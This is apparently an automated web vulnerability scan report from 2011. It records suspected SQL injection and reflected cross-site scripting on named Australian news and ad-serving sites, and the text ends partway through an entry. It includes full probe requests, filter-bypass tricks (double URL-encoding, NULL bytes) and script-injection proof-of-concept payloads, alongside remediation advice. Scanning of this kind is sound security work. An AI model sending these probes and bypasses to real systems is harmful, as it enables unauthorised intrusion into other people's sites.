The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://data.weatherzone.com.au/json/animator/ [df parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://data.weatherzone.com.au
Path:   /json/animator/

Issue detail

The df parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the df parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /json/animator/?lt=radarz&lc=070&type=radar&df=HH%3Amm%20z'&frames=4&callback=cbrad070 HTTP/1.1
Host: data.weatherzone.com.au
Proxy-Connection: keep-alive
Referer: http://weather.news.com.au/wa/perth/perth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_jk/1.2.31
Content-Length: 2457
Content-Type: text/html;charset=utf-8
Cache-Control: max-age=10
Expires: Wed, 07 Sep 2011 14:17:20 GMT
Date: Wed, 07 Sep 2011 14:17:10 GMT
Connection: close
Vary: Accept-Encoding

<html><head><title>Apache Tomcat/6.0.20 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...
</b> Exception report</p>
...[SNIP]...
<pre>org.apache.jasper.JasperException: java.lang.IllegalArgumentException: Unterminated quote
   org.apache.jasper.servlet.JspServletWrapper.handleJspException(JspServletWrapper.java:522)
   org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.
...[SNIP]...
<u>The full stack trace of the root cause is available in the Apache Tomcat/6.0.20 logs.</u>
...[SNIP]...

Request 2

GET /json/animator/?lt=radarz&lc=070&type=radar&df=HH%3Amm%20z''&frames=4&callback=cbrad070 HTTP/1.1
Host: data.weatherzone.com.au
Proxy-Connection: keep-alive
Referer: http://weather.news.com.au/wa/perth/perth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_jk/1.2.31
Content-Length: 1101
Content-Type: text/javascript
Cache-Control: max-age=10
Expires: Wed, 07 Sep 2011 14:17:21 GMT
Date: Wed, 07 Sep 2011 14:17:11 GMT
Connection: close
Vary: Accept-Encoding


cbrad070({
"frames": [
{ "image": "http://data.weatherzone.com.au/httpdata_r/images/radar/anims/rad_15lev_070_zoom_640x480/rad_15lev_070_zoom_640x480.201109071330.png", "ti
...[SNIP]...

1.2. http://tools.ntnews.com.au//admin/gallery_images/remote/2011/02/06/tn_165705.jpg [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tools.ntnews.com.au
Path:   //admin/gallery_images/remote/2011/02/06/tn_165705.jpg

Issue detail

The REST URL parameter 7 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 7, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET //admin/gallery_images/remote/2011/02/06/tn_165705.jpg' HTTP/1.1
Host: tools.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:18:14 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n47 ( lax-agg-n14), ms lax-agg-n14 ( origin>CONN backup-origin)
Cache-Control: max-age=120
Expires: Wed, 07 Sep 2011 14:20:14 GMT
Age: 0
Content-Length: 18
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

<!-- failover -->

Request 2

GET //admin/gallery_images/remote/2011/02/06/tn_165705.jpg'' HTTP/1.1
Host: tools.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 301 Moved Permanently
Date: Wed, 07 Sep 2011 14:18:16 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n47 ( lax-agg-n30), ms lax-agg-n30 ( origin>CONN)
Cache-Control: no-cache
Content-Length: 413
Content-Type: text/html
Location: http://www.ntnews.com.au/images/gallery/remote/2011/02/06/tn_165705.jpg''
Connection: keep-alive

<html>
<head><title> 301 Moved Permanently
</title></head>
<body><h1> 301 Moved Permanently
</h1>
The document has been permanently moved to <A HREF="%s">here</A>.<hr />
Powered By <a href='http://w
...[SNIP]...

1.3. http://tools.ntnews.com.au//admin/gallery_images/remote/2011/07/13/tn_197121.jpg [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tools.ntnews.com.au
Path:   //admin/gallery_images/remote/2011/07/13/tn_197121.jpg

Issue detail

The REST URL parameter 7 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 7, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 7 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET //admin/gallery_images/remote/2011/07/13/tn_197121.jpg%2527 HTTP/1.1
Host: tools.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:18:20 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n47 ( lax-agg-n54), ms lax-agg-n54 ( origin>CONN backup-origin>CONN)
Cache-Control: max-age=120
Expires: Wed, 07 Sep 2011 14:20:20 GMT
Age: 0
Content-Length: 18
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

<!-- failover -->

Request 2

GET //admin/gallery_images/remote/2011/07/13/tn_197121.jpg%2527%2527 HTTP/1.1
Host: tools.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 301 Moved Permanently
Date: Wed, 07 Sep 2011 14:18:21 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n47 ( lax-agg-n42), ms lax-agg-n42 ( origin>CONN)
Cache-Control: no-cache
Content-Length: 413
Content-Type: text/html
Location: http://www.ntnews.com.au/images/gallery/remote/2011/07/13/tn_197121.jpg%27%27
Connection: keep-alive

<html>
<head><title> 301 Moved Permanently
</title></head>
<body><h1> 301 Moved Permanently
</h1>
The document has been permanently moved to <A HREF="%s">here</A>.<hr />
Powered By <a href='http://w
...[SNIP]...

1.4. http://tools.ntnews.com.au/photo-gallery/photo_galleries_js.php [category_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://tools.ntnews.com.au
Path:   /photo-gallery/photo_galleries_js.php

Issue detail

The category_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the category_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /photo-gallery/photo_galleries_js.php?category_id=4561,4521,4501,90,4551,4351'&title=Photo%20Galleries HTTP/1.1
Host: tools.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:46 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n47 ( lax-agg-n51), ms lax-agg-n51 ( origin>CONN)
Cache-Control: max-age=301
Expires: Wed, 07 Sep 2011 14:21:47 GMT
Age: 0
Content-Length: 240
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

get_All_Photo_Categorys: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') AND ec.active = 'Y' GROUP BY ec.category_id ORDER BY displayorder' at line 9

1.5. http://tools.themercury.com.au/admin/gallery_images/remote/2011/09/06/345781.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tools.themercury.com.au
Path:   /admin/gallery_images/remote/2011/09/06/345781.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /admin'/gallery_images/remote/2011/09/06/345781.jpg HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 503 Service Unavailable
Date: Wed, 07 Sep 2011 14:19:01 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n18), ms lax-agg-n18 ( origin>CONN)
Retry-After: 0
Cache-Control: no-cache
Content-Length: 321
Content-Type: text/html; charset=utf-8
Connection: keep-alive


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailabl
...[SNIP]...
<h1>Error 503 Service Unavailable</h1>
...[SNIP]...

Request 2

GET /admin''/gallery_images/remote/2011/09/06/345781.jpg HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 14:19:02 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n37), ms lax-agg-n37 ( origin>CONN)
Cache-Control: private, no-cache, max-age=0
Pragma: no-cache
Content-Length: 389
Content-Type: text/html
Connection: keep-alive

<html>
<head><title> 404 Not Found
</title></head>
<body><h1> 404 Not Found
</h1>
The resource requested could not be found on this server!<hr />
Powered By <a href='http://www.litespeedtech.com'>Li
...[SNIP]...

1.6. http://tools.themercury.com.au/feeds/feed-with-lead.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tools.themercury.com.au
Path:   /feeds/feed-with-lead.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /feeds'/feed-with-lead.php?category_id=55&range=0to6&1801 HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:18:17 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n53), ms lax-agg-n53 ( origin>CONN backup-origin>CONN)
Cache-Control: max-age=120
Expires: Wed, 07 Sep 2011 14:20:18 GMT
Age: 0
Content-Length: 18
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

<!-- failover -->

Request 2

GET /feeds''/feed-with-lead.php?category_id=55&range=0to6&1801 HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 14:18:19 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n42), ms lax-agg-n42 ( origin>CONN)
Cache-Control: private, no-cache, max-age=0
Pragma: no-cache
Content-Length: 389
Content-Type: text/html
Connection: keep-alive

<html>
<head><title> 404 Not Found
</title></head>
<body><h1> 404 Not Found
</h1>
The resource requested could not be found on this server!<hr />
Powered By <a href='http://www.litespeedtech.com'>Li
...[SNIP]...

1.7. http://tools.themercury.com.au/feeds/feed-with-lead.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tools.themercury.com.au
Path:   /feeds/feed-with-lead.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /feeds/feed-with-lead.php?category_id=3&range=0to6&rss_name=-world-news&1801&1%00'=1 HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:18:18 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n46), ms lax-agg-n46 ( origin>CONN backup-origin)
Cache-Control: max-age=120
Expires: Wed, 07 Sep 2011 14:20:19 GMT
Age: 0
Content-Length: 18
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

<!-- failover -->

Request 2

GET /feeds/feed-with-lead.php?category_id=3&range=0to6&rss_name=-world-news&1801&1%00''=1 HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:18:20 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n42), ms lax-agg-n42 ( origin>CONN)
Cache-Control: max-age=301
Expires: Wed, 07 Sep 2011 14:23:21 GMT
Age: 0
Content-Length: 1482
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

document.write('<div class="article-extracts-box"><div class="me2-extract-box"><div class="ark-img-class"><a href="http://tools.themercury.com.au/stories/48248721-world-news.php" ><img src="http://res
...[SNIP]...

1.8. http://tools.themercury.com.au/yoursay/yoursay-single-extract.php [range parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://tools.themercury.com.au
Path:   /yoursay/yoursay-single-extract.php

Issue detail

The range parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the range parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /yoursay/yoursay-single-extract.php?range=0to1' HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:17:53 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n17), ms lax-agg-n17 ( origin>CONN)
Cache-Control: max-age=301
Expires: Wed, 07 Sep 2011 14:22:54 GMT
Age: 0
Content-Length: 167
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

get_Comment_Summary:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 3

2. Cross-site scripting (reflected)  previous  next
There are 91 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://ad.agkn.com/iframe!t=1131! [clk1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The value of the clk1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d73d0"><script>alert(1)</script>64a7d9f07a6 was submitted in the clk1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1131!?che=232308004977525073&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=232308004977525073d73d0"><script>alert(1)</script>64a7d9f07a6&mt_id=126413&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ANBtDABvUqUAAAAAAKWdKAAAAAAAAAAEAAYAAAAAAA4AAQAECv9yGAAAAAAApOAxAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAt.P91Hhp9D9mZmZmZmYAQLfz.dR4aQRAZmZmZmZmEEC38.3UeGkEQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbWlKL0GCwCkbi.Ht16nRW0QY8xOdnphfsjmdBAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-2.html%3Fcb%3D0.5778487676288933,Z%3D728x90%26_salt%3D1883775268%26anmember%3D514%26anprice%3D%26keyword%3Dwa%2Fnews_home%26r%3D0%26s%3D814544,b9e906a8-d95b-11e0-963b-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=53894362007404304; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Mon, 05-Sep-2016 14:15:28 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BjkAAAAAABwBArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fm19rYKZg5%2FzAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Fri, 06-Sep-2013 14:15:28 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:15:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=232308004977525073d73d0"><script>alert(1)</script>64a7d9f07a6&mt_id=126413&mt_adid=101060&redirect=http://ad.agkn.com/interaction!che=629767453?imid=7889652898655870963&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Cons
...[SNIP]...

2.2. http://ad.agkn.com/iframe!t=1131! [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The value of the mt_adid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2738"><script>alert(1)</script>aaf70b1dcec was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1131!?che=232308004977525073&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=232308004977525073&mt_id=126413&mt_adid=101060e2738"><script>alert(1)</script>aaf70b1dcec&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ANBtDABvUqUAAAAAAKWdKAAAAAAAAAAEAAYAAAAAAA4AAQAECv9yGAAAAAAApOAxAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAt.P91Hhp9D9mZmZmZmYAQLfz.dR4aQRAZmZmZmZmEEC38.3UeGkEQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbWlKL0GCwCkbi.Ht16nRW0QY8xOdnphfsjmdBAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-2.html%3Fcb%3D0.5778487676288933,Z%3D728x90%26_salt%3D1883775268%26anmember%3D514%26anprice%3D%26keyword%3Dwa%2Fnews_home%26r%3D0%26s%3D814544,b9e906a8-d95b-11e0-963b-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=53894362007404304; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Mon, 05-Sep-2016 14:15:29 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BjkBAAAAACABArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8flXuAmg0WtthAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Fri, 06-Sep-2013 14:15:29 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:15:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=232308004977525073&mt_id=126413&mt_adid=101060e2738"><script>alert(1)</script>aaf70b1dcec&redirect=http://ad.agkn.com/interaction!che=1113815159?imid=6191889184259234657&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Produc
...[SNIP]...

2.3. http://ad.agkn.com/iframe!t=1131! [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The value of the mt_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31576"><script>alert(1)</script>5388910874 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

